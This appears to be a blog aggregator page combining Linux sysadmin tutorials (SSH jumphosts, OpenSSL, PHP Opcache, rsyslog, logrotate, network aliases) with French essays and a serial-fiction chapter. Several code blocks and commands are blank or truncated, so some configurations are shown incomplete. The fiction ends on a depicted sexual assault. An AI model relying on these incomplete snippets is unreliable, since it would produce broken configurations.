$ httpry -i eth0  >  HEAD  /  HTTP/1.1  -    -  <  -     -            -  HTTP/1.1  301  Moved Permanently

To output above is the result of the following HTTP call.

$ curl -I -H "Host:"

It did a HEAD request (-I) and got a 301 HTTP redirect back.

Want to see how many HTTP requests are flowing through per second and which vhost is the most active? Start httpry with the -s parameter.

$ httpry -i eth0 -s
2015-08-06 21:06:56	19 rps
2015-08-06 21:06:56	61 rps
2015-08-06 21:06:56	totals	30.69 rps
2015-08-06 21:07:01	21 rps
2015-08-06 21:07:01	56 rps
2015-08-06 21:07:01	totals	32.41 rps

Every 5 seconds, the output shows the requests made in that last interval. It shows the Host: headers used in that request and the amount of requests that were received.

While it doesn't work on HTTPS requests, it is a useful tool to have in your arsenal.

The post Monitor All HTTP Requests (like TCPdump) On a Linux Server with httpry appeared first on

by Mattias Geniar at August 06, 2015 07:10 PM

How To Use A Jumphost in your SSH Client Configurations

The post How To Use A Jumphost in your SSH Client Configurations appeared first on

Jumphosts are used as intermediate hops between your actual SSH target and yourself. Instead of using something like "unsecure" SSH agent forwarding, you can use ProxyCommand to proxy all your commands through your jumphost.

Using SSH Jumphosts

Consider the following scenario.


You want to connect to HOST B and have to go through HOST A, because of firewalling, routing, access privileges, ... There's a number of legit reasons why jumphosts are needed, not just preferred.

Classic SSH Jumphost configuration

A configuration like this will allow you to proxy through HOST A.

$ cat .ssh/config

Host host-a
  User your_username

Host host_b
  User your_username
  Port 22
  ProxyCommand ssh -q -W %h:%p host-a

Now if you want to connect to your HOST B, all you have to type is ssh host_b, which will first connect to host-a in the background (that's the ProxyCommand being executed) and start the SSH session to your actual target.

SSH Jumphost configuration with netcat (nc)

Alternatively, if you can't/don't want to use ssh to tunnel your connections, you can also use nc (netcat).

$ cat .ssh/config

Host host-a
  User your_username

Host host_b
  User your_username
  Port 22
  ProxyCommand ssh host-a nc -w 120 %h %p

This has the same effect.

Sudo in ProxyCommands

If netcat is not available to you as a regular user, because permissions are limited, you can prefix your ProxyCommand's with sudo. The SSH configuration essentially allows you to run any command on your intermediate host, as long as you have the privileges to do so.

$ cat .ssh/config

  ProxyCommand ssh host-a sudo nc -w 120 %h %p

ProxyCommand options allow you to configure SSH as you like, including jumphost configurations like these.

The post How To Use A Jumphost in your SSH Client Configurations appeared first on

by Mattias Geniar at August 06, 2015 06:50 PM

How To Create A Self-Signed SSL Certificate With OpenSSL

The post How To Create A Self-Signed SSL Certificate With OpenSSL appeared first on

Creating a self-signed SSL certificate isn't difficult with OpenSSL. These kind of SSL certificates are perfect for testing, development environments or anything else that requires SSL, but that doesn't necessarily have to be a trusted SSL certificate.

If you use this in an Nginx or Apache configuration, your visitors will see a big red "Your connection is not private" warning message first, before they can browse through. This isn't for production, just for testing.

To generate a self-signed SSL certificate in a single openssl command, run the following in your terminal.

$ openssl req -x509 -sha256 -newkey rsa:2048 -keyout certificate.key -out certificate.crt -days 1024 -nodes

You'll be prompted for several questions, the only that that really matters is the Common Name question, which will be used as the hostname/dns name the self-signed SSL certificate is made for. (Although: even with a valid Common Name, it's still a self-signed SSL certificate and browsers will still find it invalid untrusted.)

Here's the output of that command.

$ openssl req -x509 -sha256 -newkey rsa:2048 -keyout certificate.key -out certificate.crt -days 1024 -nodes

Generating a 2048 bit RSA private key
writing new private key to 'certificate.key'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:BE
State or Province Name (full name) [Some-State]:Antwerp
Locality Name (eg, city) []:Antwerp
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Some Organization Ltd
Organizational Unit Name (eg, section) []:IT Department
Common Name (e.g. server FQDN or YOUR name) []: your.domain.tld
Email Address []:info@yourdomain.tld

If you don't want to fill in those questions every time, you can run a single command with the Common Name as a command line argument. It'll generate the self-signed SSL certificate for you straight away, without pestering you for questions like Country Name, Organization, ...

$ openssl req -x509 -sha256 -newkey rsa:2048 -keyout certificate.key -out certificate.crt -days 1024 -nodes -subj '/CN=my.domain.tld'

Generating a 2048 bit RSA private key
writing new private key to 'certificate.key'

The result with both openssl commands will be 2 new files in your current working directory.

$ ls -alh
-rw-r--r--   1 mattias  1.7K  certificate.crt
-rw-r--r--   1 mattias  1.6K  certificate.key

You can use the certificate.key as the key for your SSL configurations. It doesn't have a password associated with it, that's what the -nodes (No DES encryption) option was for when running the openssl command. If you want a password on your private key, remove that option and run the openssl command again.

$ cat certificate.key

The certificate.crt contains your certificate file, the "public" part of your certificate.

$ cat certificate.crt

Now you have a self-signed SSL certificate and a private key you can use for your server configurations.

The post How To Create A Self-Signed SSL Certificate With OpenSSL appeared first on

by Mattias Geniar at August 06, 2015 05:30 PM

August 05, 2015

Mattias Geniar

supervisor job: spawnerr: can’t find command ‘something’

The post supervisor job: spawnerr: can’t find command ‘something’ appeared first on

I love supervisor, an easy to use process controller on Linux. It allows you to configure a process that should always run, similar to god (ruby).

Sometimes though, supervisor isn't happy. It can throw the following error in your stderr logs.

2015-08-05 15:50:25,311 INFO supervisord started with pid 16450
2015-08-05 15:50:26,312 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:27,315 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:29,318 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:32,322 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:32,322 INFO gave up: my-worker entered FATAL state, too many start retries too quickly

Well that's annoying.

The supervisor config looked decent enough though, nothing wrong to be seen here.

$ cat /etc/supervisor.d/my_worker.ini

It was supposed to su - to the user defined in the config and run the ./my-worker from its $HOME directory. However, that's not what happens.

When supervisor executes something as a different user, it doesn't modify the $PATH variable. In fact, it's mentioned clearly on the configuration documentation.

[program:x] Section Values
If it is relative, the supervisord’s environment $PATH will be searched for the executable.

The tool I wanted to run wasn't in supervisor's $PATH though.

To fix this, it's just a matter of making all commands in your configurations use absolute paths -- instead of relative paths. Configure the full path in the command= config parameter, and supervisor will happily start your configuration.

This'll work:

$ cat /etc/supervisor.d/my_worker.ini

Hope it helps you one day too!

The post supervisor job: spawnerr: can’t find command ‘something’ appeared first on

by Mattias Geniar at August 05, 2015 08:45 PM

How To Clear PHP’s Opcache

The post How To Clear PHP’s Opcache appeared first on

PHP can be configured to store precompiled bytecode in shared memory, called Opcache. It prevents the loading and parsing of PHP scripts on every request. This guide will tell you how to flush that bytecode Opcache, should you need it.

You may want to flush the APC (PHP < 5.5) or Opcache (PHP >= 5.5) in PHP when it has cached code you want to refresh. As of PHP 5.5, the APC cache has been replaced by Opcache and APC only exists as a user key/value cache, no longer a bytecode cache.

Determine your PHP method

You can run PHP in multiple ways. The last few years, PHP has evolved into new methods, ranging from CGI to FastCGI to mod_php and PHP-FPM. Flushing your Opcache depends on how you run PHP.

If you want a uniform way of flushing your Opcache, you can create a PHP file called flush_cache.php in your docroot with content like this.


Every time you want to flush your Opcache, you can browse to that file and it'll call opcache_reset(); for your entire Opcache. The next PHP request to your site will populate the cache again.

It's important that you call that URL in the same way you would reach your website, either via a HTTP:// or HTTPS:// URL. Running php flush_cache.php at the command line won't flush the cache of your running processes.

This can be part of your deployment process, where after each deploy you curl that particular URL.

If you want a server-side solution, check further.

PHP running as CGI or FastCGI

Flushing the Opcache on CGI or FastCGI PHP is super simple: it can't be done.

Not because you can't flush the cache, but because the cache is flushed on every request anyway. FastCGI starts a new php-cgi process on every request and does not have a parent PHP process to store the Opcache results in.

In fact, having Opcache running in a CGI or FastCGI model would hurt performance: on every request the Opcache is stored in the FastCGI process (default behaviour if the Opcache extension activated), but that cache is destroyed as soon as that process dies after finishing the request.

Storing the Opcache takes a few CPU cycles and is an effort that cannot be benefited from again later.

CGI or FastCGI is about the worst possible way to run your PHP code.

PHP running at the CLI

All PHP you run at the command line has no Opcache. It can be enabled, and PHP can attempt to store its Opcache in memory, but as soon as your CLI command ends, the cache is gone as well.

To clear the Opcache on CLI, just restart your PHP command. It's usually as simple as CTRL+C to abort the command and start it again.

For the same reason as running PHP as CGI or FastCGI above, having Opcache enabled for CLI requests would hurt performance more than you would gain benefits from it.

Apache running as mod_php

If you run Apache, you can run PHP by embedding a module inside your Apache webserver. By default, PHP is executed as the same user your Apache webserver is running.

To flush the Opcache in a mod_php scenarion, you can either reload or restart your Apache webserver.

$ service httpd reload
$ apachectl graceful

A reload should be sufficient as it will clear the Opcache in PHP. A restart will also work, but is more invasive as it kills all active HTTP connections.

PHP running as PHP-FPM

If you run your PHP as PHP-FPM, you can send a reload to your PHP-FPM daemon. The reload will flush the Opcache and force it to be rebuilt on the first incoming request.

$ service php-fpm reload

If you are running multiple PHP master, you can reload a single master to only reset that masters' Opcache. By default, it will flush the entire cache, no matter how many websites you have running.

If you want more control at the command line, you can use a tool like cachetool that can connect to your PHP-FPM socket and send it commands, the same way a webserver would.

First, download the phar that you can use to manipulate the cache.

$ curl -sO

Next, use that phar to send commands to your PHP-FPM daemon.

$ php cachetool.phar opcache:reset --fcgi=
$ php cachetool.phar opcache:reset --fcgi=/var/run/php5-fpm.sock

Using something like cachetool can also be easily integrated in your automated deploy process.

The post How To Clear PHP’s Opcache appeared first on

by Mattias Geniar at August 05, 2015 05:30 PM

August 04, 2015

Mattias Geniar

How To Take a Screenshot on Your Apple Watch

The post How To Take a Screenshot on Your Apple Watch appeared first on

Taking a screenshot on your Apple Watch is just as easy as taking a screenshot on your phone: hold down the only 2 buttons available on the device at the same time.


Click the scroll wheel ("digital crown") and the contacts button simultaneously. The watch will make an audible sound, take a screenshot and then sync it to your iPhone's Photo library in a few seconds.

To access the screenshot, just navigate to your Photos and by the time you get there, the screenshot will have synced there.

Wondering if you should get one? Read my Apple Watch review to find out.

The post How To Take a Screenshot on Your Apple Watch appeared first on

by Mattias Geniar at August 04, 2015 09:24 PM

Rsyslog Configuration with Dynamic Log File Destination Based On Program Name

The post Rsyslog Configuration with Dynamic Log File Destination Based On Program Name appeared first on

I wanted to create a configuration using the default rsyslog tool on RHEL/CentOS, that would dynamically store log files depending on the "program name" that performs the logs.

Disclaimer: this is not a safe configuration. Anyone can pretend to be any program on a Linux box with syslog, so you can't trust the data 100%. But it's a nice little separator for having multiple applications run, each with its own identity.

To create dynamic logfiles, based on the $programname variable in rsyslog, you first have to define a dynamic destination template.

~$ cat /etc/rsyslog.d/custom_logging.conf

$template CUSTOM_LOGS,"/var/log/%programname%.log"

Once you have such a dynamic template, you can begin to redirect syslogs there that match a certain pattern. In this case, I want to send every application that begins with the letter "n", and have each application write to its own log.

~$ cat /etc/rsyslog.d/custom_logging.conf

if $programname startswith 'n' then ?CUSTOM_LOGS
& ~

The closing & ~ are closing tags to stop processing of further rules.

Alternatively, you can match a specific programname as well.

~$ cat /etc/rsyslog.d/custom_logging.conf

if $programname == 'my_custom_app' then ?CUSTOM_LOGS
& ~

To tie it all together, if you want to have dynamic logs based on the application name, make an rsyslog config that looks like this.

~$ cat /etc/rsyslog.d/custom_logging.conf

# Template the destination file
$template CUSTOM_LOGS,"/var/log/%programname%.log"

# Match anything that starts with the letter "n" and
# rewrite it to /var/log/$programname.log
if $programname startswith 'n' then ?CUSTOM_LOGS
& ~

To test the configuration, use the logger tool and pass along arguments to tag your messages. These tags are interpreted by rsyslog as the $programname variable used in the examples above.

$ logger -t n_application1 "this gets written to log 'n_application1' "
$ logger -t myapp "this gets written to log 'myapp' "

For more information on the rsyslog filtering options, have a look at the rsyslog v5 filter documentation (default on CentOS/RHEL) or the latest rsylog v8 filter documentation.

It's mostly REGEX based.

If you want to do more advanced logging, you're probably better of investigating tools like syslog-ng or logstash.

The post Rsyslog Configuration with Dynamic Log File Destination Based On Program Name appeared first on

by Mattias Geniar at August 04, 2015 09:17 PM

Logrotate On RHEL/CentOS 7 Complains About Insecure Permissions on Parent Directory, World Writable

The post Logrotate On RHEL/CentOS 7 Complains About Insecure Permissions on Parent Directory, World Writable appeared first on

Since Logrotate 3.8, which is default on Red Hat Enterprise Linux and CentOS 7, the parent permissions on your log directories play a vital role in whether or not logrotate will be able/willing to process your logs.

If your permissions allow writes by a group that isn't root, you may see the following error when logrotate tries to run.

$ logrotate /etc/logrotate.d/something

error: skipping "/var/www/vhosts/site.tld/logs/access.log" because parent directory has insecure permissions (It's world writable or writable by group which is not "root") Set "su" directive in config file to tell logrotate which user/group should be used for rotation.

error: skipping "/var/www/vhosts/site.tld/logs/error.log" because parent directory has insecure permissions (It's world writable or writable by group which is not "root") Set "su" directive in config file to tell logrotate which user/group should be used for rotation.

A default logrotate config, that looks like this, can cause that problem.

$ cat /etc/logrotate.d/something

/var/www/vhosts/site.tld/logs/access.log {
  create 0640 site_user httpd
    /sbin/service httpd reload > /dev/null 2>/dev/null || true

It has the create statement, to recreate the logs with correct ownership/permissions, but that's not sufficient for logrotate.

To resolve this problem, and have logrotate work properly again, you also have to add the su $user $group configuration. This causes logrotate to actually su - to that user and execute all logrotate actions as that user.

$ cat /etc/logrotate.d/something

/var/www/vhosts/site.tld/logs/access.log {
  create 0640 site_user httpd
    /sbin/service httpd reload > /dev/null 2>/dev/null || true
  su site_user httpd

By adding a su site_user httpd in the example above, the same as the create config, logrotate can process the logs again with parent directories that have group permissions that allow groups other than root to write to those directories.

The post Logrotate On RHEL/CentOS 7 Complains About Insecure Permissions on Parent Directory, World Writable appeared first on

by Mattias Geniar at August 04, 2015 08:59 PM

Frank Goossens

Music from Our Tube; Eska’s Shades of Blue

Lovely summery tune by a great singer (whom I mentioned here a couple of years ago already); Eska with Shades of Blue;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

While perusing related video’s I came across this heart-warming quirky live in-the-barn version of “Gate Keeper” from back in 2012 and in that same barn Lianne La Havas covered Little Dragon’s ‘Twice’ accompanied by nothing but a truly superb bass. Who knew barns could be so cool? ;-)

by frank at August 04, 2015 09:21 AM

Lionel Dricot

Le paradoxe de la corrida


Un homme est devenu, en quelques heures, l’être le plus détesté des réseaux sociaux car il a tué un lion pour son propre plaisir. En même temps, l’Europe s’émouvait du massacre « traditionnel » de dauphins aux îles Féroé.

De la conscience émotionnelle collective semble émerger un consensus sur le fait qu’il soit indigne pour un être humain de massacrer des animaux conscients pour son seul plaisir. Parfois, tuer n’est pas nécessaire : faire souffrir l’animal est amplement suffisant pour s’attirer les foudres du monde entier. Vu notre réaction collective, cela semble même plus grave que la mort d’êtres humains.

C’est ce que j’appelle « le paradoxe de la corrida ». Parce que il semble de plus en plus difficile de trouver des justifications à la corrida dont le seul et unique objectif est de divertir en faisant souffrir et en tuant des animaux.

Mais pourquoi est-ce paradoxal ?

Tout simplement car nous cautionnons par notre alimentation des systèmes de souffrance et de mort sans aucune mesure avec une partie de chasse ou le fait de planter des banderilles dans un taureau. L’industrie de la viande est devenue l’industrialisation de la souffrance d’animaux comme la vache, de la même espèce que le taureau que nous défendons tant en luttant contre la corrida !

Pourtant, il est aujourd’hui tout à fait possible de se nourrir de manière entièrement végétarienne. L’alimentation végétarienne est non seulement moins génératrice de souffrance, elle est également bien plus écologique et, en règle générale, plus équilibrée et garante d’une meilleure santé. Tuer des animaux n’est plus nécessaire à notre survie.

Mais alors que nous sommes prompts à nous indigner pour un lion, un dauphin ou un taureau, nous ne pouvons renoncer à massacrer industriellement, dans des souffrances atroces, des animaux extrêmement intelligents et sympathiques comme la vache, le cochon ou le poulet.

La raison ?

Car c’est trop bon ! Car je ne pourrais pas me passer de viande. Car je suis carnivore, c’est une tradition. Car je suis passionné de gastronomie typique.

Les seuls arguments pour justifier la souffrance et le massacre sont donc le pur plaisir personnel égoïste et la tradition. Y’a-t-il une différence avec la chasse, le massacre de dauphins ou la corrida ?

Non mais tu ne comprends pas. Je ne peux pas vivre sans un délicieux hamburger.

Et Walter Palmer ne peut pas vivre sans ce frisson d’adrénaline que lui procure le fait de pourchasser un animal. Où est la différence morale ? En plus, toi tu peux trouver des alternatives à ton plaisir que lui n’a pas, alternatives qui seront bientôt parfaites.

Cette hypocrisie est tellement ancrée qu’elle touche même les personnes les mieux informées. Ainsi, les apnéistes sont traditionnellement de grands défenseurs du milieu marin, sauveurs des requins et autres espèces menacées. Les mêmes, pourtant, adorent la pêche sous-marine au harpon. Pour le sport. Et avec pour maigre justification morale :

Oui mais je mange tout ce que je pêche !

En période de famine et de déficit calorique, cet argument serait tout à fait recevable. Mais dans une société où l’on mange trop, où l’alimentation végétarienne est disponible dans tous les supermarchés, le fait de volontairement tuer et de potentiellement déséquilibrer un éco-système extrêmement fragile n’est moralement pas cohérent pour qui se targue de défendre l’écologie et la vie animale.

Car, au fond, il ne s’agit « que » de poissons. Pour une raison obscure, le fait que ces animaux nagent fait des poissons une espèce sous-animale qu’on peut torturer et exploiter à volonté, les restaurants n’hésitant pas à proposer du poisson ou des fruits de mer dans les plats végétariens, nonobstant le fait que la pêche, sous quelque forme, est un désastre écologique, que la plupart des espèces en voie de disparition le sont dans nos océans à cause de la pêche.

Avant d’attaquer le dentiste Walter Palmer et les toreadors, nous devrions plutôt scruter nos propres comportements et regarder dans notre propre assiette.

En fait, nous sommes même pires qu’un Walter Palmer ! À cause du gaspillage et de la surconsommation, nous abattons industriellement des animaux afin de pouvoir simplement jeter leur viande à la poubelle sans même procurer le moindre plaisir !

Il est bien entendu possible d’adopter une morale dite « spéciste » : les animaux sont inférieurs aux humains et l’humain n’a aucun compte à leur rendre, il peut les traiter comme il veut. Tout comme le racisme il y a quelques décennies, le spécisme est moralement rationnel et peut former un système arbitrairement cohérent pour peu qu’on en accepte les conséquences : un animal est un animal, on ne va pas s’émouvoir pour un animal, poisson, vache, chat ou lion.

Mais si les images d’animaux ensanglantés servant de trophées et de divertissement ne vous laissent pas indifférents, si vous pensez que l’acte de Walter Palmer relève de la barbarie, si les photos d’une mer rougie par le sang des dauphins vous prend à la gorge, peut-être n’êtes vous pas un véritable spéciste. Mais comment agir de manière concrète pour changer le monde ? C’est simple : arrêtez de tuer des animaux pour votre plaisir, même si vous les mangez, et réduisez, même symboliquement, votre consommation de viande et de poisson.

Un geste simple et progressif qui, même s’il ne s’agit que d’un seul repas par semaine, fera beaucoup plus pour la planète et les animaux que toutes les pétitions et likes sur Facebook du monde.


Photo par Chema Concellón.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at August 04, 2015 08:13 AM

August 03, 2015

Lionel Dricot

Printeurs 35

Ceci est le billet 35 sur 35 dans la série Printeurs

Nellio, Junior et Eva se sont engouffrés dans des capsules intertube les conduisant aux mystérieuses coordonnées communiquées par Max.


Les méandres de l’esprit humain sont impénétrables. Alors que mon corps est inconfortablement compressé dans un espace exigu contenant à peine de quoi respirer, je ne peux m’empêcher de philosopher.

Comment expliquer que cette partie de l’intertube soit déjà fonctionnelle alors que la définition d’un projet gouvernemental implique généralement un retard conséquent ?

La réponse demande un certain cheminement mental. En dehors de se faire élire, le rôle des politiciens qui composent le gouvernement est de faire en sorte que l’argent public s’évapore le plus vite possible.

Il n’est bien sûr plus question, de nos jours, de détournements directs. Le risque serait bien trop grand de se faire prendre et condamner. Un minimum de subtilité est devenu nécessaire.

Dès qu’un peu d’argent public est disponible, le politicien le dépensera de manière à optimiser sa visibilité sur les réseaux. Inaugurer la toute première liaison d’intertube semble, sur ce point, une excellente idée. Mais le plus important est assurément d’obtenir, légalement, un pourcentage sur ces dépenses. Et quoi de plus facile que de financer des grands travaux, une liaison intertube par exemple, en utilisant comme prestataire surpayé une société dont on est actionnaire ? Ou qui nous engagera comme consultant après notre retraite politique bien méritée ?

Le fait que je sois bringuebalé dans cet intertube signifie donc qu’il y a dans les parages un politicien en fin de parcours qui vide les caisses. En annonçant une station d’intertube, il laissera l’image d’un gestionnaire visionnaire et entreprenant. Son successeur, par contre, héritera de l’impopularité due à une situation budgétaire catastrophique.

Alors que je suis emporté à des centaines de kilomètre/heure dans le noir absolu, je ne peux m’empêcher de m’indigner. Comment se fait-il que notre système de gouvernement soit à ce point corrompu ?

Mais au fond, cela a-t-il encore la moindre importance ? Les élections sont vécues comme un divertissement, à mi-chemin entre les compétitions sportives et les séries si chères aux télé-pass. Les commissariats privés imposent leurs propres règles et plus personnes ne fait vraiment attention aux lois que débattent les politiciens, lois qui réglementent de toutes façons des domaines dans lesquels ils sont complètement incompétents. Nous nous contentons de leur verser un impôt avec le seul espoir qu’ils nous foutent la paix. Ces impôts servent à financer une administration qui tourne désormais en vase clos : les différents ministères travaillent les uns pour les autres en déconnexion totale du reste du monde.

Dans l’étanche obscurité de mon cercueil projectile, l’absurdité de notre société me frappe soudainement comme un éclair. J’ai l’impression de découvrir le monde, d’être un nouveau-né, un extra-terrestre.

Dans un monde automatisé, le travail n’apporte plus de valeur mais, au contraire, de l’inefficacité. De qualité il devient une tare. Sans changement de paradigme économique, la valeur ne se crée plus, elle se dissipe. Le seul moyen de s’enrichir est donc de devenir soi-même un point d’évaporation. Soit en récoltant la valeur et en prétendant la redistribuer au nom du bien public, ce que fait la politique, soit en convaincant le public de nous acheter un bien ou un service quelconque, quel que soit son inutilité.

Il ne s’agit donc plus d’être utile mais de convaincre le monde qu’on l’est. L’apparence a pris le pas sur l’essence, donnant naissance à la publicité ! La publicité ! Le maillon central ! C’est la raison pour laquelle je n’avais jamais pris le recul nécessaire. La publicité nous formate, nous empêche de nous concentrer. Son omniprésence transforme le cerveau en simple récepteur. Il m’a fallu cette cure sans lentille de contact et cet isolement sensoriel pour que, enfin, mes neurones se remettent à fonctionner.

Face à ce modèle de société, le printeur représente la menace ultime. En mettant à nu l’inutilité de la plupart des emplois actuels, le printeur poussera les travailleurs à remettre en question l’utilité de tous, y compris de leurs dirigeants. La rigidité morale qui fait des télé-pass des parias, des sous-hommes, des fainéants, n’est possible que s’ils sont en minorité et si on continue à leur fournir un espoir, celui de devenir un jour utiles. Si cet espoir disparaît, si la compétition entre eux n’a plus lieu d’être, si la majorité de la population devient télé-pass…

Je frissonne. Jamais encore je ne n’avais envisagé les conséquences sociétales du printeur. Les motivations de Georges Farreck me semblent désormais moins obscures : après tout, malgré sa richesse et sa notoriété, il n’a jamais été qu’un pion, un outil publicitaire, un homme sandwich de luxe. Les printeurs auraient inéluctablement été inventés et finiront, quoi qu’il puisse arriver, par chambouler l’ordre social. Autant être du bon côté…


Un choc ! Je m’assomme à moitié sur la paroi de mon récipient avant de constater que toute vibration, tout changement de direction a cessé. Je suis certainement arrivé à destination.

Poussant la trappe, je m’extirpe et pose le pied dans un court couloir bien éclairé. Pas la moindre trace d’Eva, qui devrait pourtant m’avoir précédé. Elle n’a pu que sortir pas cette porte rouge, brillante. Tout est incroyablement propre. Il flotte dans l’air cette odeur caractéristique des nouveaux bâtiments.

Un bruit. Junior vient d’arriver. J’ouvre la trappe de sa capsule et je suis immédiatement accueilli par un hurlement. Il est couvert de sang et se tient la main droite en gémissant.
– Mes doigts ! Mes doigts !
Tout en le hissant sur le sol du couloir, j’examine sa blessure. Les doigts de sa main droite ont tous été coupés nets à hauteur des métacarpes. Je frémis d’horreur. Il a fait tout ce trajet dans le noir en hurlant et en se couvrant de son propre sang !
— Que s’est-il passé ?
— Le départ était trop rapide, j’ai pas eu le temps de retirer ma main.
Arrachant un morceau de mon t-shirt, je lui fais un bandage de fortune.
— Saloperie de corps biologique de merde ! Rien ne serait arrivé avec un avatar. Et je ne pourrais même plus taper au clavier !
— T’as pas une pilule sur toi qui pourrait faire office d’anti-douleur ?
— Dans ma poche droite… Du tiroflan… Argh, ça fait mal !
Lui fouillant le pantalon, je prends aussitôt deux gélules oranges que je lui fais gober.

Sa respiration se fait moins rapide, plus espacée.
– Viens ! Il faut qu’on trouve un moyen pour soigner cela un peu mieux.

L’attrapant par la taille, je l’aide à marcher et nous nous dirigeons vers la porte rouge. À notre approche, celle-ci s’ouvre automatiquement, sans le moindre bruit.

La pièce dans laquelle nous nous trouvons est emplie d’appareils électroniques de mesure et d’écrans d’ordinateurs. Je sursaute et manque de pousser un cri d’effroi. Sur une table, Eva est étendue, complètement nue, les yeux grands ouverts, le regard vide. Elle ne fait pas le moindre mouvement.

Debout entre ses jambes, un homme en combinaison blanche, le pantalon sur les chevilles, est en train de la violer consciencieusement.


Photo par Glen Scott.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at August 03, 2015 02:24 PM

August 02, 2015

Mattias Geniar

How To Increase Amount of Disk inodes in Linux

The post How To Increase Amount of Disk inodes in Linux appeared first on

It doesn't happen often, but at times you may run out of inodes on a Linux system.

To find your current inode usage, run df -i.

$ df -i
Filesystem                Inodes   IUsed     IFree  IUse%   Mounted on
/dev/mapper/centos-root 19374080   19374080  0      100%   /

Out of the available 19.374.080 inodes, none were free. This is pretty much the equivalent of a disk full, except it doesn't show in terms of capacity but in terms of inodes.

If you're confused on what an inode exactly is, Wikipedia has a good description.

In a Unix-style file system, an index node, informally referred to as an inode, is a data structure used to represent a filesystem object, which can be one of various things including a file or a directory. Each inode stores the attributes and disk block location(s) of the filesystem object's data.
Wikipedia: inode

A disk with 0 available inodes is probably full of very small files, somewhere in a specific directory (applications, tmp-files, pid files, session files, ...). Each file uses (at least) 1 inode. Many million files would use many million inodes.

If your disks' inodes are full, how do you increase it? The tricky answer is, you probably can't.

The amount of inodes available on a system is decided upon creation of the partition. For instance, a default partition of EXT3/EXT4 has a bytes-per-inode ratio of one inode every 16384 bytes (16 Kb).

A 10GB partition would have would have around 622.592 inodes. A 100GB partition has around 5.976.883,2 inodes (taking into account the reserved space for super-users/journalling).

Do you want to increase the amount of inodes? Either increase the capacity of the disk entirely (Guide: Increase A VMware Disk Size (VMDK) LVM), or re-format the disk using mkfs.ext4 -i to manually overwrite the bytes-per-inode ratio.

As usual, the Archwiki has a good explanation on why we don't just make the default inode number 10x higher.

For partitions with size in the hundreds or thousands of GB and average file size in the megabyte range, this usually results in a much too large inode number because the number of files created never reaches the number of inodes.

This results in a waste of disk space, because all those unused inodes each take up 256 bytes on the filesystem (this is also set in /etc/mke2fs.conf but should not be changed). 256 * several millions = quite a few gigabytes wasted in unused inodes.
Archwiki: ext4

You may be able to create a new partition if you have spare disks/space in your LVM and chose a filesystem that's better suited to handle many small files, like ReiserFS.

The post How To Increase Amount of Disk inodes in Linux appeared first on

by Mattias Geniar at August 02, 2015 07:52 PM

How To Add Secondary IP / Alias On Network Interface in RHEL / CentOS 7

The post How To Add Secondary IP / Alias On Network Interface in RHEL / CentOS 7 appeared first on

This guide will show you how to add an extra IP address to an existing interface in Red Hat Enterprise Linux / CentOS 7. There are a few different methods than on CentOS 6, so there may be some confusion if you're trying this on a CentOS 7 system for the first time.

First, determine if your network interfaces are under the control of the Network Manager. If that's the case, you'll want to keep using the Network Manager to manage your interfaces and aliases. If it's not under Network Manager control, you can happily modify your configs by hand.

View your IP Addresses

The "old" days of Linux used to be all about ifconfig. It would show you all interfaces and their IP aliases on the server. In CentOS/RHEL 7, that's not the case. To see all IP addresses, use the ip tool.

$ ip a | grep 'inet '
    inet scope host lo
    inet brd scope global dynamic eth0
    inet brd scope global dynamic eth1

This syntax is more inline with most routers/switches, where you can grep for inet and inet6 for your IPv4 and IPv6 IP addresses.

$ ip a | grep 'inet6 '
    inet6 ::1/128 scope host
    inet6 fe80::a00:27ff:fe19:cd16/64 scope link
    inet6 fe80::a00:27ff:fefd:6f54/64 scope link

So remember: use ip over ifconfig.

Using Network Manager

Check if your interface you want to add an alias to, uses the Network Manager.

$ grep 'NM_CONTROLLED' /etc/sysconfig/network-scripts/ifcfg-ens160

If that's a yes, you can proceed with the next configurations using the Network Manager tool.

You may be used to adding a new network-scripts file in /etc/sysconfig/network-scripts/, but you'll find that doesn't work in RHEL / CentOS 7 as you'd expect if the Network Manager is being used. Here's what a config would look like in CentOS 6:

$ cat ifcfg-ens160:0

After a network reload, the primary IP address will be removed from the server and only the IP address from the alias interface will be present. That's not good. That's the Network Manager misinterpreting your configuration files, overwriting the values from your main interface with the one from your alias.

The simplest/cleanest way to add a new IP address to an existing interface in CentOS 7 is to use the nmtui tool (Text User Interface for controlling NetworkManager).

$ nmtui


Once nmtui is open, go to the Edit a network connection and select the interface you want to add an alias on.


Click Edit and tab your way through to Add to add extra IP addresses.


Save the configs and the extra IP will be added.

If you check the text-configs that have been created in /etc/sysconfig/network-scripts/, you can see how nmtui has added the alias.

$ cat /etc/sysconfig/network-scripts/ifcfg-ens192
# Alias on the interface

If you want, you can modify the text file, but I find using nmtui to be much easier.

Manually Configuring An Interface Alias

Only use this if your interface is not controlled by Network Manager.

$ grep 'NM_CONTROLLED' /etc/sysconfig/network-scripts/ifcfg-ens160

If Network Manager isn't used, you can use the old style aliases you're used to from CentOS 5/6.

$ cat ifcfg-ens160:0

Bring up your alias interace and you're good to go.

$ ifup ens160:0

Don't use this if Network Manager is in control.

Adding a temporary IP address

Want to add an IP address just for a little while? You can add one using the ip command. It only lasts until you reboot your server or restart the network service, after that -- the IP is gone from the interface.

$ ip a add dev eth0

Perfect for temporary IPs!

The post How To Add Secondary IP / Alias On Network Interface in RHEL / CentOS 7 appeared first on

by Mattias Geniar at August 02, 2015 07:29 PM

Increase/Expand an XFS Filesystem in RHEL 7 / CentOS 7

The post Increase/Expand an XFS Filesystem in RHEL 7 / CentOS 7 appeared first on

This guide will explain how to grow an XFS filesystem once you've increased in the underlying storage.

